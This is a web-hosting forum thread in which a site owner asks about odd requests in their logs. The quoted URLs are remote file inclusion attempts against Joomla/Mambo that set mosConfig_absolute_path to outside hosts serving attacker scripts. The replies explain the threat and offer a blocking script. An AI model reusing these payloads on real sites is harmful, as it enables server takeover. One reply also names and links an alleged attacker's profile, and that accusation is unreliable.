hi,
in last days i see some visitors from many ip´s that try to acess my site using this following links:

1-index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://kelate.t35.com/scripts/djd.txt???

2-index.php?option=com_wrapper&Itemid=7/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://209.250.234.234/~smdemo/images/store.jpg?

today i have receive 30 visitors from diferent ip and each one have used that path i considering to creat a script to block the ip of all people that try acess my site using that strange path:confused:
i receive visit from google crawl and yahoo altavista etc
and none of them use that strange link there is a atack is someone trying find some segurity problem or what?
this only happen in hostmonster account i have other host in the past that i never see this situation...
any one know what this is?
thanks a lot for your help
:)

It's a stupid script kiddie trying to use a rootkit.

Don't worry you're safe. I've checked the codes he's using. They won't work in Hostmonster.

If you're curious, this is the little clueless kid who's doing it:

http://www.myspace.com/matyie

If I can find this "hacker" on MySpace in less than 5 minutes, don't worry, you're pretty safe...

I'm working on a PHP script that will log these things in detail and automatically deny access to the addresses from which they originate. It's in the development stages, so keep an eye out in the coming months. ;)

It's a stupid script kiddie trying to use a rootkit.

Don't worry you're safe. I've checked the codes he's using. They won't work in Hostmonster.

If you're curious, this is the little clueless kid who's doing it:

http://www.myspace.com/matyie

If I can find this "hacker" on MySpace in less than 5 minutes, don't worry, you're pretty safe...

Im curious, what is a rootkit? How could a full fledged hacker really damage my site?

Im curious, what is a rootkit? How could a full fledged hacker really damage my site?

root is the username used for administrator in most *nix and linux systems, rootkit is a program / code / script that exploits a software / server vulnerability to obtain root access which means administrator access.

You will see tons of rootkit / hack attempts during the day, because hackers find or code scripts that will scan full vulnerabilities randomly to a given public ip address class.

:cool:

In any case, damaging YOUR site is much easier than taking over the server (which was the intent of the hacker).

If a "hacker" wants to damage your site he/she only needs to scan or know a SQL Injection vulnerability of the script you're using, which are unfortunately fairly common in today's software. With such a vulnerability, the hacker can do many things: From changing the information showing on your page, to retrieving your administration password.

In this case, this hacker was trying to do that, but instead of damaging the site, it tried to install a rootkit through it in order to take over the server. But the code he was using was useleless inside Hostmonster's enviroment.

I have a working PHP script to log and ban IP addresses associated with injection query strings. If anyone is interested, I expect to have a public release available within the week -- as soon as I complete the auto-installer. ;)

I have a working PHP script to log and ban IP addresses associated with injection query strings. If anyone is interested, I expect to have a public release available within the week -- as soon as I complete the auto-installer. ;)

meaning this would protect us from all this rootkit crap and bigger threats? i had an old website that i had let go for a few weeks, when i came back, it was redirecting to a nazi site. not fun

I have a working PHP script to log and ban IP addresses associated with injection query strings. If anyone is interested, I expect to have a public release available within the week -- as soon as I complete the auto-installer. ;)

I'm interested! :D

meaning this would protect us from all this rootkit crap and bigger threats? i had an old website that i had let go for a few weeks, when i came back, it was redirecting to a nazi site. not fun

That's correct. It will intercept injection strings before they can execute arbitrary code.

I've released a beta version of the Injection Scanner. A download link and instructions are located at http://www.myphpscripts.net/forum/viewtopic.php?t=113